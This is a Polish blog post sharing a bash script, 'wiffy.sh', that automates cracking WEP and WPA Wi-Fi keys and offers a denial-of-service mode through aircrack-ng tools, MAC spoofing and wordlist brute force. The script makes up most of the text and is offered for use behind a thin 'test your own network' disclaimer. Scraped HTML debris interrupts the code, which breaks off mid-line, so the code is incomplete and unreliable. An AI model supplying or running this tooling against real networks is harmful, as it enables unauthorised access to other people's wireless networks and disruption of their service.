Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o.
\nJednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-><\/p>\n
Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k<\/em> What we need?<\/em> How to use it?<\/em> Praktycznie i teoretycznie na tym koniec. Mog\u0119 si\u0119 pochwali\u0107 \u017ce „m\u00f3j” WEP uda\u0142o si\u0119 z\u0142ama\u0107 i to bardzo sprawnie.
\nMusze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu mo\u017cemy z\u0142ama\u0107 zabezpieczenie WEP swojej sieci w kilka sekund czy minut ( W zale\u017cno\u015bci od z\u0142o\u017cono\u015bci has\u0142a ).<\/p>\n
\n– Karte sieciow\u0105,
\n– Skrypt wiffy.sh
\n– S\u0142ownik w przypadku ch\u0119ci z\u0142amania WPA\/WPA2<\/p>\n
\n– Uruchamiamy skrypt poprzez konsol\u0119, \u00a0( Wcze\u015bniej edytujemy skrypt dla naszego interfejsu, np. wlan0 )
\n– Czekamy.. gotowe.<\/p>\n
\n
\nSkrypt:<\/p>\n\n#!\/bin\/bash\n#----------------------------------------------------------------------------------------------#\n#wiffy.sh v0.1 (#5 2010-09-13) #\n# (C)opyright 2010 - g0tmi1k #\n#---License------------------------------------------------------------------------------------#\n# This program is free software: you can redistribute it and\/or modify it under the terms #\n# of the GNU General Public License as published by the Free Software Foundation, either #\n# version 3 of the License, or (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #\n# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #\n# See the GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License along with this program. #\n# If not, see
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) 